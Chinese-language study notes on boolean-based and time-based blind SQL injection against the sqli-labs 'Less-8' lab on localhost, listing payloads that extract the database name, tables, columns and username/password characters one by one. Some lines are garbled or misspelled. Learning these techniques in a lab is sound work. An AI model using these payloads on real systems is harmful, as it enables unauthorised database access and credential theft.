sqli中时间型盲注和布尔型盲注实现

布尔型注入：

• 等待时间较长，但容易受网络波动影响，所以无法作为绝对判断条件。

②利用length语句判断数据库长度

http://127.0.0.1/sqli/Less-8/?id=1' and length(database()) >7 -- +

http://127.0.0.1/sqli/Less-8/?id=1’ and length(database()) >8 -- +，异常

所以长度为8

http://127.0.0.1/sqli/Less-8/?id=1’ and length(database()) =8 -- +，正常能进

③求当前数据库库名的第一个字符（求数据库名的ASCII值）

?id=1’ and ascii(substr(database(),1,1))>114  ,正常能进

http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr(database(),1,1))>115   -- +,不能进

所以http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr(database(),1,1))=115   -- +,ascii为115

④求当前数据库所有表的数量

http://127.0.0.1/sqli/Less-8/Id=1’and(selectcount(table_name)from http://127.0.0.1/sqli/Less-8/ information_schema.tables where table_schema=’security’) =4  ，进去，说明表数量为4

⑤求表名长度

http://127.0.0.1/sqli/Less-8/and if((select length(table_name) from information_schema.tables where table_shcema='secuity' limit 0,1)=6,sleep(5),1) -- +

limit 0,1从第一行显示，往后显示一行

⑥求表名对应的ASCII值

?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101%23

⑦求列的数量

id=1’ and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)=3%23

⑧.求列名的长度

http://127.0.0.1/sqli/Less-8/and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3   -- +

⑨求列名对应的ASCII值

id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’limit 0,1),1,1))=105%23

⑩求字段的数量     

id=1’ and (select count(username) from security.users)=13%23

⑪求字段内容的长度

http://127.0.0.1/sqli/Less-8/and (select length(username) from security.users limit 0,1)=4    -- +

⑫.求字段对应的ASCII值

http://127.0.0.1/sqli/Less-8/and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68    -- +

时间型盲注：

①求数据库库名长度

id=1’and if(length(database())=8,sleep(3),1) -- +

②求数据库库名对应的ascii值

id=1’ and if(ascii(substr((select database()),1,1))=115,sleep(3),1) -- +

③求表的数量

id=1’and if((select count(*)from information_schema.tables where table_schema=’security’)=4,sleep(3),1) -- +

④求表名的长度

id=1’ and if((select length(table_name)from information_schema.tables where table_schema=’security’limit 0,1)=6,sleep(3),1) -- +

⑤求表名对应的ascii码

id=1’ and if(ascii(substr((select (table_name)from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,sleep(3),1) -- +

⑥求列的数量

id=1’ and if((select count(column_name)from information_schema.columns where table_schema=’security’ and table_name=’users’)=3,sleep(3),1) -- +

⑦求列名的ascii码

id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(3),1) -- +

⑧求字段数量

id=1' and if((select count(username)from security.users)=13,sleep(3),1) -- +

⑨求字段内容

id=1’ and if(ascii(substr((select concat(username,0x23,password)from security.users limit 0,1),1,1))=68,sleep(3),1) -- +